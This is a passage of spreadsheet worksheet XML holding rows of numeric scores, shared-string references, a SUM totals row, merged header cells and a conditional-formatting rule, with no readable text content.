      </c>
      <c r="K6" s="4">
        <v>0.0</v>
      </c>
      <c r="L6" s="4" t="s">
        <v>557</v>
      </c>
      <c r="M6" s="4">
        <v>1.0</v>
      </c>
      <c r="N6" s="4"/>
    </row>
    <row r="7" ht="15.75" customHeight="1">
      <c r="A7" s="4" t="s">
        <v>558</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>559</v>
      </c>
      <c r="C7" s="4">
        <v>1.0</v>
      </c>
      <c r="D7" s="4" t="s">
        <v>560</v>
      </c>
      <c r="E7" s="4">
        <v>2.0</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>561</v>
      </c>
      <c r="G7" s="4">
        <v>1.0</v>
      </c>
      <c r="H7" s="4">
        <v>0.0</v>
      </c>
      <c r="I7" s="4" t="s">
        <v>562</v>
      </c>
      <c r="J7" s="4">
        <v>2.0</v>
      </c>
      <c r="K7" s="4">
        <v>0.0</v>
      </c>
      <c r="L7" s="4" t="s">
        <v>563</v>
      </c>
      <c r="M7" s="4">
        <v>2.0</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1">
      <c r="C8" s="10">
        <f t="shared" ref="C8:M8" si="1">SUM(C3:C7)</f>
        <v>3</v>
      </c>
      <c r="D8" s="10">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="E8" s="10">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="F8" s="10">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G8" s="10">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="H8" s="10">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="I8" s="10">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="J8" s="10">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
      <c r="K8" s="10">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="L8" s="10">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="M8" s="10">
        <f t="shared" si="1"/>
        <v>6</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1">
      <c r="H9" s="4" t="s">
        <v>564</v>
      </c>
      <c r="K9" s="4" t="s">
        <v>564</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5">
    <mergeCell ref="A1:A2"/>
    <mergeCell ref="B1:B2"/>
    <mergeCell ref="C1:F1"/>
    <mergeCell ref="G1:L1"/>
    <mergeCell ref="M1:M2"/>
  </mergeCells>
  <conditionalFormatting sqref="R1:W1">
    <cfRule type="notContainsBlanks" dxfId="0" priority="1">
      <formula>LEN(TRIM(R1))&gt;0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0.5"/>
    <col customWidth="1" min="9" max="9" width="21.25"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B1" s="1" t="s">
        <v>24</v>
      </c>
      <c r="C1" s="14" t="s">
        <v>1</v>
      </c>
      <c r="G1" s="3" t="s">
        <v>2</v>
      </c>
      <c r="M1" s="4" t="s">
        <v>3</v>
      </c>
      <c r="N1" s="1"/>
      <c r="O1" s="1"/>
      <c r="P1" s="1" t="s">
        <v>565</v>
      </c>
      <c r="Q1" s="1" t="s">
        <v>529</v>
      </c>
      <c r="R1" s="1" t="s">
        <v>530</v>
      </c>
      <c r="S1" s="1" t="s">
        <v>531</v>
      </c>
      <c r="T1" s="1" t="s">
        <v>532</v>
      </c>
      <c r="U1" s="1" t="s">
        <v>533</v>
      </c>
      <c r="V1" s="1" t="s">
        <v>534</v>
      </c>
      <c r="W1" s="1" t="s">
        <v>566</v>
      </c>
      <c r="X1" s="1" t="s">
        <v>567</v>
      </c>
      <c r="Y1" s="1" t="s">
        <v>568</v>
      </c>
      <c r="Z1" s="1" t="s">
        <v>569</v>
      </c>
      <c r="AA1" s="5"/>
      <c r="AB1" s="5"/>
      <c r="AC1" s="5"/>
      <c r="AD1" s="5"/>
      <c r="AE1" s="5"/>
      <c r="AF1" s="5"/>
      <c r="AG1" s="5"/>
      <c r="AH1" s="5"/>
      <c r="AI1" s="5"/>
      <c r="AJ1" s="5"/>
      <c r="AK1" s="5"/>
      <c r="AL1" s="5"/>
      <c r="AM1" s="5"/>
      <c r="AN1" s="5"/>
      <c r="AO1" s="5"/>
      <c r="AP1" s="5"/>
      <c r="AQ1" s="5"/>
      <c r="AR1" s="5"/>
      <c r="AS1" s="5"/>
      <c r="AT1" s="5"/>
      <c r="AU1" s="5"/>
    </row>
    <row r="2" ht="15.75" customHeight="1">
      <c r="C2" s="6" t="s">
        <v>4</v>
      </c>
      <c r="D2" s="6" t="s">
        <v>25</v>
      </c>
      <c r="E2" s="7" t="s">
        <v>5</v>
      </c>
      <c r="F2" s="7" t="s">
        <v>26</v>
      </c>
      <c r="G2" s="8" t="s">
        <v>4</v>
      </c>
      <c r="H2" s="8" t="s">
        <v>27</v>
      </c>
      <c r="I2" s="8" t="s">
        <v>28</v>
      </c>
      <c r="J2" s="9" t="s">
        <v>5</v>
      </c>
      <c r="K2" s="9" t="s">
        <v>29</v>
      </c>
      <c r="L2" s="9" t="s">
        <v>26</v>
      </c>
      <c r="N2" s="1"/>
      <c r="O2" s="1"/>
      <c r="P2" s="4" t="s">
        <v>570</v>
      </c>
      <c r="Q2" s="4">
        <v>1.0</v>
      </c>
      <c r="R2" s="4">
        <v>0.0</v>
      </c>
      <c r="S2" s="4"/>
      <c r="T2" s="4">
        <v>1.0</v>
      </c>
      <c r="U2" s="4">
        <v>0.0</v>
      </c>
      <c r="W2" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="3" ht="15.75" customHeight="1">
      <c r="A3" s="1" t="s">
        <v>571</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>572</v>
      </c>
      <c r="C3" s="4">
        <v>2.0</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>570</v>
      </c>
      <c r="E3" s="4">
        <v>2.0</v>
      </c>
      <c r="F3" s="4" t="s">
        <v>573</v>
      </c>
      <c r="G3" s="4">
        <v>2.0</v>
      </c>
      <c r="H3" s="4">
        <v>0.0</v>
      </c>
      <c r="I3" s="4" t="s">
        <v>574</v>
      </c>
      <c r="J3" s="4">
        <v>2.0</v>
      </c>
      <c r="K3" s="4">
        <v>0.0</v>
      </c>
      <c r="L3" s="4" t="s">
        <v>575</v>
      </c>
      <c r="M3" s="1">
        <v>2.0</v>
      </c>
      <c r="N3" s="4"/>
      <c r="O3" s="4"/>
      <c r="P3" s="4" t="s">
        <v>570</v>
      </c>
      <c r="Q3" s="4">
        <v>1.0</v>
      </c>
      <c r="R3" s="4">
        <v>1.0</v>
      </c>
      <c r="S3" s="4" t="s">
        <v>573</v>
      </c>
      <c r="T3" s="4">
        <v>1.0</v>
      </c>
      <c r="U3" s="4">
        <v>1.0</v>
      </c>
      <c r="W3" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="4" ht="15.75" customHeight="1">
      <c r="A4" s="4" t="s">
        <v>576</v>
      </c>
      <c r="B4" s="4" t="s">
        <v>577</v>
      </c>
      <c r="C4" s="4">
        <v>2.0</v>
      </c>
      <c r="D4" s="4" t="s">
        <v>570</v>
      </c>
      <c r="E4" s="4">
        <v>2.0</v>
      </c>
      <c r="F4" s="4" t="s">
        <v>573</v>
      </c>
      <c r="G4" s="4">
        <v>2.0</v>
      </c>
      <c r="H4" s="4">
        <v>0.0</v>
      </c>
      <c r="I4" s="4" t="s">
        <v>578</v>
      </c>
      <c r="J4" s="4">
        <v>2.0</v>
      </c>
      <c r="K4" s="4">
        <v>0.0</v>
      </c>
      <c r="L4" s="4" t="s">
        <v>575</v>
      </c>
      <c r="M4" s="4">
        <v>2.0</v>
      </c>
      <c r="N4" s="4"/>
      <c r="O4" s="4"/>
      <c r="P4" s="4" t="s">
        <v>579</v>
      </c>
      <c r="Q4" s="4">
        <v>2.0</v>
      </c>
      <c r="R4" s="4">
        <v>3.0</v>
      </c>
      <c r="S4" s="4" t="s">
        <v>580</v>
      </c>
      <c r="T4" s="4">
        <v>1.0</v>
      </c>
      <c r="U4" s="4">
        <v>2.0</v>
      </c>
      <c r="W4" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="5" ht="15.75" customHeight="1">
      <c r="A5" s="4" t="s">
        <v>581</v>
      </c>
      <c r="B5" s="4" t="s">
        <v>582</v>
      </c>
      <c r="C5" s="4">
        <v>3.0</v>
      </c>
      <c r="D5" s="4" t="s">
        <v>579</v>
      </c>
      <c r="E5" s="4">
        <v>3.0</v>
      </c>
      <c r="F5" s="4" t="s">
        <v>580</v>
      </c>
      <c r="G5" s="4">
        <v>3.0</v>
      </c>
      <c r="H5" s="4">
        <v>0.0</v>
      </c>
      <c r="I5" s="4" t="s">
        <v>578</v>
      </c>
      <c r="J5" s="4">
        <v>3.0</v>
      </c>
      <c r="K5" s="4">
        <v>0.0</v>
      </c>
      <c r="L5" s="4" t="s">
        <v>583</v>
      </c>
      <c r="M5" s="4">
        <v>3.0</v>
      </c>
      <c r="N5" s="4"/>
      <c r="O5" s="4"/>
      <c r="P5" s="4"/>
      <c r="Q5" s="4"/>
      <c r="R5" s="4"/>
      <c r="T5" s="4">
        <v>1.0</v>
      </c>
      <c r="U5" s="4">
        <v>1.0</v>
      </c>
      <c r="W5" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1">
      <c r="A6" s="4" t="s">
        <v>581</v>
      </c>
      <c r="B6" s="4" t="s">
        <v>584</v>
      </c>
      <c r="C6" s="4">
        <v>2.0</v>
      </c>
      <c r="D6" s="4" t="s">
        <v>579</v>
      </c>
      <c r="E6" s="4">
        <v>2.0</v>
      </c>
      <c r="F6" s="4" t="s">
        <v>580</v>
      </c>
      <c r="G6" s="4">
        <v>2.0</v>
      </c>
      <c r="H6" s="4">
        <v>1.0</v>
      </c>
      <c r="I6" s="4" t="s">
        <v>585</v>
      </c>
      <c r="J6" s="4">
        <v>2.0</v>
      </c>
      <c r="K6" s="4">
        <v>0.0</v>
      </c>
      <c r="L6" s="4" t="s">
        <v>586</v>
      </c>
      <c r="M6" s="4">
        <v>2.0</v>
      </c>
      <c r="N6" s="4"/>
      <c r="O6" s="4"/>
      <c r="P6" s="4" t="s">
        <v>587</v>
      </c>
      <c r="Q6" s="4">
        <v>2.0</v>
      </c>
      <c r="R6" s="4">
        <v>0.0</v>
      </c>
      <c r="S6" s="4" t="s">
        <v>588</v>
      </c>
      <c r="T6" s="4">
        <v>1.0</v>
      </c>
      <c r="U6" s="4">
        <v>0.0</v>
      </c>
      <c r="W6" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1">
      <c r="A7" s="4" t="s">
        <v>589</v>
      </c>
      <c r="B7" s="4" t="s">
        <v>590</v>
      </c>
      <c r="C7" s="4">
        <v>2.0</v>
      </c>
      <c r="D7" s="4" t="s">
        <v>587</v>
      </c>
      <c r="E7" s="4">
        <v>2.0</v>
      </c>
      <c r="F7" s="4" t="s">
        <v>588</v>
      </c>
      <c r="G7" s="4">
        <v>2.0</v>
      </c>
      <c r="H7" s="4">
        <v>0.0</v>
      </c>
      <c r="I7" s="4" t="s">
        <v>591</v>
      </c>
      <c r="J7" s="4">
        <v>2.0</v>
      </c>
      <c r="K7" s="4">
        <v>0.0</v>
      </c>
      <c r="L7" s="4" t="s">
        <v>592</v>
      </c>
      <c r="M7" s="4">
        <v>3.0</v>
      </c>
      <c r="N7" s="4"/>
      <c r="O7" s="4"/>
      <c r="P7" s="4"/>
      <c r="Q7" s="4"/>
      <c r="R7" s="4"/>
      <c r="S7" s="4"/>
      <c r="T7" s="4">
        <v>1.0</v>
      </c>
      <c r="U7" s="4">
        <v>0.0</v>
      </c>
      <c r="W7" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1">
      <c r="A8" s="4" t="s">
        <v>589</v>
      </c>
      <c r="B8" s="4" t="s">
        <v>593</v>
      </c>
      <c r="C8" s="4">
        <v>1.0</v>
      </c>
      <c r="D8" s="4" t="s">
        <v>587</v>
      </c>
      <c r="E8" s="4">
        <v>2.0</v>
      </c>
      <c r="F8" s="4" t="s">
        <v>588</v>
      </c>
      <c r="G8" s="4">
        <v>1.0</v>
      </c>
      <c r="H8" s="4">
        <v>0.0</v>
      </c>
      <c r="I8" s="4" t="s">
        <v>594</v>
      </c>
      <c r="J8" s="4">
        <v>2.0</v>
      </c>
      <c r="K8" s="4">
        <v>0.0</v>
      </c>
      <c r="L8" s="4" t="s">
        <v>595</v>
      </c>
      <c r="M8" s="4">
        <v>2.0</v>
      </c>
      <c r="N8" s="4"/>
      <c r="O8" s="4"/>
      <c r="P8" s="4"/>
      <c r="Q8" s="4"/>
      <c r="R8" s="4"/>
      <c r="S8" s="4"/>
      <c r="T8" s="4"/>
      <c r="U8" s="4"/>
      <c r="W8" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1">
      <c r="A9" s="4" t="s">
        <v>596</v>
      </c>
      <c r="B9" s="4" t="s">
        <v>593</v>
      </c>
      <c r="C9" s="4">
        <v>2.0</v>
      </c>
      <c r="D9" s="4" t="s">
        <v>587</v>
      </c>
      <c r="E9" s="4">
        <v>2.0</v>
      </c>
      <c r="F9" s="4" t="s">
        <v>588</v>
      </c>
      <c r="G9" s="4">
        <v>2.0</v>
      </c>
      <c r="H9" s="4">
        <v>0.0</v>
      </c>
      <c r="I9" s="4" t="s">
        <v>597</v>
      </c>
      <c r="J9" s="4">
        <v>2.0</v>
      </c>
      <c r="K9" s="4">
        <v>0.0</v>
      </c>
      <c r="L9" s="4" t="s">
        <v>595</v>
      </c>
      <c r="M9" s="4">
        <v>2.0</v>
      </c>
      <c r="N9" s="4"/>
      <c r="O9" s="4"/>
      <c r="P9" s="4" t="s">
        <v>598</v>
      </c>
      <c r="Q9" s="4">
        <v>1.0</v>
      </c>
      <c r="R9" s="4">
        <v>0.0</v>
      </c>
      <c r="S9" s="4" t="s">
        <v>599</v>
      </c>
      <c r="T9" s="4">
        <v>1.0</v>
      </c>
      <c r="U9" s="4">
        <v>0.0</v>
      </c>
      <c r="W9" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1">
      <c r="A10" s="4" t="s">
        <v>600</v>
      </c>
      <c r="B10" s="4" t="s">
        <v>601</v>
      </c>
      <c r="C10" s="4">
        <v>1.0</v>
      </c>
      <c r="D10" s="4" t="s">
        <v>602</v>
      </c>
      <c r="E10" s="4">
        <v>1.0</v>
      </c>
      <c r="F10" s="4" t="s">
        <v>603</v>
      </c>
      <c r="G10" s="4">
        <v>1.0</v>
      </c>
      <c r="H10" s="4">
        <v>0.0</v>
      </c>
      <c r="I10" s="4" t="s">
        <v>604</v>
      </c>
      <c r="J10" s="4">
        <v>1.0</v>
      </c>
      <c r="K10" s="4">
        <v>0.0</v>
      </c>
      <c r="L10" s="4" t="s">
        <v>595</v>
      </c>
      <c r="M10" s="4">
        <v>3.0</v>
      </c>
      <c r="N10" s="4"/>
      <c r="O10" s="4"/>
      <c r="P10" s="4"/>
      <c r="Q10" s="4">
        <v>2.0</v>
      </c>
      <c r="R10" s="4"/>
      <c r="S10" s="4"/>
      <c r="T10" s="4">
        <v>2.0</v>
      </c>
      <c r="U10" s="4"/>
      <c r="W10" s="4">
        <v>2.0</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1">
      <c r="A11" s="4" t="s">
        <v>605</v>
      </c>
      <c r="B11" s="4" t="s">
        <v>606</v>
      </c>
      <c r="C11" s="4">
        <v>2.0</v>
      </c>
      <c r="D11" s="4" t="s">
        <v>602</v>
      </c>
      <c r="E11" s="4">
        <v>2.0</v>
      </c>
      <c r="F11" s="4" t="s">
        <v>599</v>
      </c>
      <c r="G11" s="4">
        <v>2.0</v>
      </c>
      <c r="H11" s="4">
        <v>0.0</v>
      </c>
      <c r="I11" s="4" t="s">
        <v>607</v>
      </c>
      <c r="J11" s="4">
        <v>2.0</v>
      </c>
      <c r="K11" s="4">
        <v>0.0</v>
      </c>
      <c r="L11" s="4" t="s">
        <v>595</v>
      </c>
      <c r="M11" s="4">
        <v>2.0</v>
      </c>
      <c r="P11" s="4"/>
      <c r="Q11" s="4"/>
      <c r="R11" s="4"/>
      <c r="S11" s="4"/>
      <c r="T11" s="4"/>
      <c r="U11" s="4"/>
      <c r="W11" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="12" ht="15.75" customHeight="1">
      <c r="A12" s="4" t="s">
        <v>605</v>
      </c>
      <c r="B12" s="4" t="s">
        <v>608</v>
      </c>
      <c r="C12" s="4">
        <v>3.0</v>
      </c>
      <c r="D12" s="4" t="s">
        <v>598</v>
      </c>
      <c r="E12" s="4">
        <v>3.0</v>
      </c>
      <c r="F12" s="4" t="s">
        <v>599</v>
      </c>
      <c r="G12" s="4">
        <v>3.0</v>
      </c>
      <c r="H12" s="4">
        <v>1.0</v>
      </c>
      <c r="I12" s="4" t="s">
        <v>609</v>
      </c>
      <c r="J12" s="4">
        <v>3.0</v>
      </c>
      <c r="K12" s="4">
        <v>0.0</v>
      </c>
      <c r="L12" s="4" t="s">
        <v>595</v>
      </c>
      <c r="M12" s="4">
        <v>3.0</v>
      </c>
      <c r="N12" s="4"/>
      <c r="O12" s="4"/>
      <c r="P12" s="4"/>
      <c r="Q12" s="4">
        <v>1.0</v>
      </c>
      <c r="R12" s="4"/>
      <c r="S12" s="4"/>
      <c r="T12" s="4">
        <v>1.0</v>
      </c>
      <c r="U12" s="4"/>
      <c r="W12" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1">
      <c r="A13" s="4" t="s">
        <v>610</v>
      </c>
      <c r="B13" s="4" t="s">
        <v>611</v>
      </c>
      <c r="C13" s="4">
        <v>2.0</v>
      </c>
      <c r="D13" s="4" t="s">
        <v>598</v>
      </c>
      <c r="E13" s="4">
        <v>2.0</v>
      </c>
      <c r="F13" s="4" t="s">
        <v>599</v>
      </c>
      <c r="G13" s="4">
        <v>2.0</v>
      </c>
      <c r="H13" s="4">
        <v>0.0</v>
      </c>
      <c r="I13" s="4" t="s">
        <v>612</v>
      </c>
      <c r="J13" s="4">
        <v>2.0</v>
      </c>
      <c r="K13" s="4">
        <v>0.0</v>
      </c>
      <c r="L13" s="4" t="s">
        <v>595</v>
      </c>
      <c r="M13" s="4">
        <v>1.0</v>
      </c>
      <c r="N13" s="4"/>
      <c r="O13" s="4"/>
      <c r="P13" s="4"/>
      <c r="Q13" s="4"/>
      <c r="R13" s="4"/>
      <c r="S13" s="4"/>
      <c r="T13" s="4"/>
      <c r="U13" s="4"/>
      <c r="W13" s="4">
        <v>1.0</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1">
      <c r="A14" s="4" t="s">
        <v>613</v>
      </c>
      <c r="B14" s="4" t="s">
        <v>614</v>
      </c>
      <c r="C14" s="4">
        <v>2.0</v>
      </c>
      <c r="D14" s="4" t="s">
        <v>602</v>
      </c>
      <c r="E14" s="4">
        <v>2.0</v>
      </c>
      <c r="F14" s="4" t="s">
        <v>599</v>
      </c>
      <c r="G14" s="4">
        <v>2.0</v>
      </c>
      <c r="H14" s="4">
        <v>0.0</v>
      </c>
      <c r="I14" s="4" t="s">
        <v>615</v>
      </c>
      <c r="J14" s="4">
        <v>2.0</v>
      </c>
      <c r="K14" s="4">
        <v>0.0</v>
      </c>
      <c r="L14" s="4" t="s">
        <v>595</v>
      </c>
      <c r="M14" s="4">
        <v>2.0</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1">
      <c r="A15" s="4" t="s">
        <v>613</v>
      </c>
      <c r="B15" s="4" t="s">
        <v>614</v>
      </c>
      <c r="C15" s="4">
        <v>3.0</v>
      </c>
      <c r="D15" s="4" t="s">
        <v>602</v>
      </c>
      <c r="E15" s="4">
        <v>3.0</v>
      </c>
      <c r="F15" s="4" t="s">
        <v>599</v>
      </c>
      <c r="G15" s="4">
        <v>3.0</v>
      </c>
      <c r="H15" s="4">
        <v>0.0</v>
      </c>
      <c r="I15" s="4" t="s">
        <v>615</v>
      </c>
      <c r="J15" s="4">
        <v>3.0</v>
      </c>
      <c r="K15" s="4">
        <v>0.0</v>
      </c>
      <c r="L15" s="4" t="s">
        <v>595</v>
      </c>
      <c r="M15" s="4">
        <v>5.0</v>
      </c>
      <c r="N15" s="4"/>
      <c r="O15" s="4"/>
      <c r="P15" s="4" t="s">
        <v>616</v>
      </c>
      <c r="Q15" s="4">
        <v>0.0</v>
      </c>
      <c r="R15" s="4"/>
      <c r="S15" s="4" t="s">
        <v>617</v>
      </c>
      <c r="T15" s="4">
        <v>1.0</v>
      </c>
      <c r="U15" s="4">
        <v>0.0</v>
      </c>
      <c r="W15" s="4">
        <v>1.0</v>
      </c>
      <c r="Y15" s="4">
        <v>1.0</v>
      </c>
      <c r="Z15" s="4" t="s">
        <v>618</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1">
      <c r="A16" s="4" t="s">
        <v>619</v>
      </c>
      <c r="B16" s="4" t="s">
        <v>620</v>
      </c>
      <c r="C16" s="4">
        <v>2.0</v>
      </c>
      <c r="D16" s="4" t="s">
        <v>616</v>
      </c>
      <c r="E16" s="4">
        <v>3.0</v>
      </c>
      <c r="F16" s="4" t="s">
        <v>617</v>
      </c>
      <c r="G16" s="4">
        <v>2.0</v>
      </c>
      <c r="H16" s="4">
        <v>0.0</v>
      </c>
      <c r="I16" s="4" t="s">
        <v>621</v>
      </c>
      <c r="J16" s="4">
        <v>3.0</v>
      </c>
      <c r="K16" s="4">
        <v>0.0</v>
      </c>
      <c r="L16" s="4" t="s">
        <v>622</v>
      </c>
      <c r="M16" s="4">
        <v>2.0</v>
      </c>
      <c r="N16" s="4"/>
      <c r="O16" s="4"/>
      <c r="P16" s="4"/>
      <c r="Q16" s="4"/>
      <c r="R16" s="4"/>
      <c r="S16" s="4"/>
      <c r="T16" s="4"/>
      <c r="U16" s="4"/>
      <c r="W16" s="4">
        <v>1.0</v>
      </c>
      <c r="Y16" s="4"/>
      <c r="Z16" s="4"/>
    </row>
    <row r="17" ht="15.75" customHeight="1">
      <c r="A17" s="4" t="s">
        <v>619</v>
      </c>
      <c r="B17" s="4" t="s">
        <v>623</v>
      </c>
      <c r="C17" s="4">
        <v>1.0</v>
      </c>
      <c r="D17" s="4" t="s">
        <v>616</v>
      </c>
      <c r="E17" s="4">
        <v>2.0</v>
      </c>
      <c r="F17" s="4" t="s">
        <v>617</v>
      </c>
      <c r="G17" s="4">
        <v>1.0</v>
      </c>
      <c r="H17" s="4">
        <v>0.0</v>
      </c>
      <c r="I17" s="4" t="s">
        <v>624</v>
      </c>
      <c r="J17" s="4">
        <v>2.0</v>
      </c>
      <c r="K17" s="4">
        <v>0.0</v>
      </c>
      <c r="L17" s="4" t="s">
        <v>622</v>
      </c>
      <c r="M17" s="4">
        <v>3.0</v>
      </c>
      <c r="N17" s="4"/>
      <c r="O17" s="4"/>
      <c r="P17" s="4" t="s">
        <v>625</v>
      </c>
      <c r="Q17" s="4"/>
      <c r="R17" s="4">
        <v>1.0</v>
      </c>
      <c r="S17" s="4" t="s">
        <v>626</v>
      </c>
      <c r="T17" s="4">
        <v>1.0</v>
      </c>
      <c r="U17" s="4">
        <v>0.0</v>
      </c>
      <c r="W17" s="4">
        <v>1.0</v>
      </c>
      <c r="Y17" s="4">
        <v>1.0</v>
      </c>
      <c r="Z17" s="4" t="s">
        <v>627</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1">
      <c r="A18" s="4" t="s">
        <v>628</v>
      </c>
      <c r="B18" s="4" t="s">
        <v>629</v>
      </c>
      <c r="C18" s="4">
        <v>3.0</v>
      </c>
      <c r="D18" s="4" t="s">
        <v>625</v>
      </c>
      <c r="E18" s="4">
        <v>3.0</v>
      </c>
      <c r="F18" s="4" t="s">
        <v>626</v>
      </c>
      <c r="G18" s="4">
        <v>3.0</v>
      </c>
      <c r="H18" s="4">
        <v>1.0</v>
      </c>
      <c r="I18" s="4" t="s">
        <v>630</v>
      </c>
      <c r="J18" s="4">
        <v>4.0</v>
      </c>
      <c r="K18" s="4">
        <v>0.0</v>
      </c>
      <c r="L18" s="4" t="s">
        <v>631</v>
      </c>
      <c r="M18" s="4">
        <v>4.0</v>
      </c>
      <c r="N18" s="4"/>
      <c r="O18" s="4"/>
      <c r="P18" s="4"/>
      <c r="Q18" s="4"/>
      <c r="R18" s="4"/>
      <c r="S18" s="4"/>
      <c r="T18" s="4">
        <v>3.0</v>
      </c>
      <c r="U18" s="4">
        <v>0.0</v>
      </c>
      <c r="W18" s="4">
        <v>3.0</v>
      </c>
      <c r="Y18" s="4"/>
      <c r="Z18" s="4"/>
    </row>
    <row r="19" ht="15.75" customHeight="1">
      <c r="A19" s="4" t="s">
        <v>628</v>
      </c>
      <c r="B19" s="4" t="s">
        <v>632</v>
      </c>
      <c r="C19" s="4">
        <v>1.0</v>
      </c>
      <c r="D19" s="4" t="s">
        <v>625</v>
      </c>
      <c r="E19" s="4">
        <v>2.0</v>
      </c>
      <c r="F19" s="4" t="s">
        <v>626</v>
      </c>
      <c r="G19" s="4">
        <v>1.0</v>
      </c>
      <c r="H19" s="4">
        <v>0.0</v>
      </c>
      <c r="I19" s="4" t="s">
        <v>633</v>
      </c>
      <c r="J19" s="4">
        <v>2.0</v>
      </c>
      <c r="K19" s="4">
        <v>1.0</v>
      </c>
      <c r="L19" s="4" t="s">
        <v>634</v>
      </c>
      <c r="M19" s="4">
        <v>2.0</v>
      </c>
      <c r="N19" s="4"/>
      <c r="O19" s="4"/>
      <c r="P19" s="4"/>
      <c r="Q19" s="4"/>
      <c r="R19" s="4"/>
      <c r="S19" s="4"/>
      <c r="T19" s="4"/>
      <c r="U19" s="4"/>
      <c r="W19" s="4"/>
      <c r="Y19" s="4"/>
      <c r="Z19" s="4"/>
    </row>
    <row r="20" ht="15.75" customHeight="1">
      <c r="A20" s="4" t="s">
        <v>628</v>
      </c>
      <c r="B20" s="4" t="s">
        <v>632</v>
      </c>
      <c r="C20" s="4">
        <v>1.0</v>
      </c>
      <c r="D20" s="4" t="s">
        <v>625</v>
      </c>
      <c r="E20" s="4">
        <v>1.0</v>
      </c>
      <c r="F20" s="4" t="s">
        <v>626</v>
      </c>
      <c r="G20" s="4">
        <v>1.0</v>
      </c>
      <c r="H20" s="4">
        <v>0.0</v>
      </c>
      <c r="I20" s="4" t="s">
        <v>633</v>
      </c>
      <c r="J20" s="4">
        <v>1.0</v>
      </c>
      <c r="K20" s="4">
        <v>0.0</v>
      </c>
      <c r="L20" s="4" t="s">
        <v>634</v>
      </c>
      <c r="M20" s="4">
        <v>1.0</v>
      </c>
      <c r="N20" s="4"/>
      <c r="O20" s="4"/>
      <c r="P20" s="4"/>
      <c r="Q20" s="4"/>
      <c r="R20" s="4"/>
      <c r="S20" s="4"/>
      <c r="T20" s="4"/>
      <c r="U20" s="4"/>
      <c r="W20" s="4"/>
      <c r="Y20" s="4"/>
      <c r="Z20" s="4"/>
    </row>
    <row r="21" ht="15.75" customHeight="1">
      <c r="A21" s="4" t="s">
        <v>628</v>
      </c>
      <c r="B21" s="4" t="s">
        <v>632</v>
      </c>
      <c r="C21" s="4">
        <v>2.0</v>
      </c>
      <c r="D21" s="4" t="s">
        <v>625</v>
      </c>
      <c r="E21" s="4">
        <v>4.0</v>
      </c>
      <c r="F21" s="4" t="s">
        <v>626</v>
      </c>
      <c r="G21" s="4">
        <v>2.0</v>
      </c>
      <c r="H21" s="4">
        <v>0.0</v>
      </c>
      <c r="I21" s="4" t="s">
        <v>633</v>
      </c>
      <c r="J21" s="4">
        <v>4.0</v>
      </c>
      <c r="K21" s="4">
        <v>0.0</v>
      </c>
      <c r="L21" s="4" t="s">
        <v>634</v>
      </c>
      <c r="M21" s="4">
        <v>4.0</v>
      </c>
      <c r="N21" s="4"/>
      <c r="O21" s="4"/>
      <c r="P21" s="4" t="s">
        <v>635</v>
      </c>
      <c r="Q21" s="4"/>
      <c r="R21" s="4">
        <v>2.0</v>
      </c>
      <c r="S21" s="4" t="s">
        <v>636</v>
      </c>
      <c r="T21" s="4">
        <v>1.0</v>
      </c>
      <c r="U21" s="4">
        <v>0.0</v>
      </c>
      <c r="W21" s="4">
        <v>1.0</v>
      </c>
      <c r="Y21" s="4">
        <v>1.0</v>
      </c>
      <c r="Z21" s="4" t="s">
        <v>637</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1">
      <c r="A22" s="4" t="s">
        <v>638</v>
      </c>
      <c r="B22" s="4" t="s">
        <v>639</v>
      </c>
      <c r="C22" s="4">
        <v>1.0</v>
      </c>
      <c r="D22" s="4" t="s">
        <v>635</v>
      </c>
      <c r="E22" s="4">
        <v>3.0</v>
      </c>
      <c r="F22" s="4" t="s">
        <v>626</v>
      </c>
      <c r="G22" s="4">
        <v>1.0</v>
      </c>
      <c r="H22" s="4">
        <v>0.0</v>
      </c>
      <c r="I22" s="4" t="s">
        <v>640</v>
      </c>
      <c r="J22" s="4">
        <v>3.0</v>
      </c>
      <c r="K22" s="4">
        <v>0.0</v>
      </c>
      <c r="L22" s="4" t="s">
        <v>641</v>
      </c>
      <c r="M22" s="4">
        <v>3.0</v>
      </c>
      <c r="N22" s="4"/>
      <c r="O22" s="4"/>
      <c r="P22" s="4"/>
      <c r="Q22" s="4"/>
      <c r="R22" s="4"/>
      <c r="S22" s="4"/>
      <c r="T22" s="4">
        <v>1.0</v>
      </c>
      <c r="U22" s="4">
        <v>0.0</v>
      </c>
      <c r="W22" s="4">
        <v>1.0</v>
      </c>
      <c r="Y22" s="4"/>
      <c r="Z22" s="4"/>
    </row>
    <row r="23" ht="15.75" customHeight="1">
